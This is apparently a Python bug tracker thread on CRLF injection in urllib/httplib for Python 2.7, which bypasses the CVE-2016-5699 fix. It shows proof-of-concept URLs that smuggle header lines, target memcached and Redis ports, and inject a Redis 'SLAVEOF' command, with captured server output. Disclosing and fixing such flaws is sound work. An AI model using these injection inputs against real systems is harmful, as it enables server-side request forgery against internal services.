Title: CRLF Injection in httplib
Type: security Stage:
Components: Library (Lib) Versions: Python 2.7
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: martin.panter, orange, serhiy.storchaka, xiang.zhang
Priority: normal Keywords:

Created on 2017-05-24 15:01 by orange, last changed 2017-11-26 01:04 by martin.panter.

Messages (4)
msg294360 - (view) Author: Orange (orange) Date: 2017-05-24 15:01
Hi, the patch in CVE-2016-5699 can be broke by an addition space.

import urllib, urllib2

urllib.urlopen('\r\n\x20hihi\r\n :11211')
urllib2.urlopen('\r\n\x20hihi\r\n :11211')
msg295026 - (view) Author: Xiang Zhang (xiang.zhang) * (Python committer) Date: 2017-06-02 15:36
Looking at the code and the previous issue #22928, CRLF immediately followed by a tab or space (obs-fold: CRLF 1*( SP / HTAB )) is a valid part of a header value so the regex deliberately ignore them.

So it looks right to me the url given doesn't raise the same exception as the url without spaces, though the given url seems malformed.
msg295067 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2017-06-03 07:01
You can also inject proper HTTP header fields (or do multiple requests) if you omit the space after the CRLF:

urlopen("http://localhost:8000/ HTTP/1.1\r\nHEADER: INJECTED\r\nIgnore:")

Data sent to the server:
>>> server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
>>> server.bind(("localhost", 8000))
>>> server.listen()
>>> [conn, addr] = server.accept()
>>> pprint(conn.recv(300).splitlines(keepends=True))
[b'GET / HTTP/1.1\r\n',
 b'Ignore: HTTP/1.1\r\n',
 b'Accept-Encoding: identity\r\n',
 b'User-Agent: Python-urllib/3.5\r\n',
 b'Connection: close\r\n',
 b'Host: localhost:8000\r\n',

Issue 14826 is already open about how “urlopen” handles spaces, and there is a patch in Issue 13359 that proposes to also encode newline characters. But if the CRLF or header injection is a security problem, then 2.7 etc could be changed to raise an exception (like Issue 22928), or to do percent encoding.
msg306981 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2017-11-26 01:04
Actually, the CRLF + space can be injected via percent encoding, so just dealing with literal CRLFs and spaces wouldn’t be enough. You would have to validate the hostname after it is decoded.

urlopen(" . . . :6379/")

>>> pprint(conn.recv(300).splitlines(keepends=True))
[b'GET / HTTP/1.1\r\n',
 b'Accept-Encoding: identity\r\n',
 b' SLAVEOF . . . :6379\r\n',
 b'Connection: close\r\n',
 b'User-Agent: Python-urllib/2.7\r\n',
Date User Action Args
2017-11-26 01:04:36martin.pantersetmessages: + msg306981
2017-11-26 01:00:28martin.panterlinkissue32085 dependencies
2017-11-26 00:03:14martin.pantersettype: security
2017-06-03 07:01:33martin.pantersetmessages: + msg295067
2017-06-02 15:36:20xiang.zhangsetnosy: + xiang.zhang, serhiy.storchaka, martin.panter
messages: + msg295026
2017-05-24 15:01:31orangecreate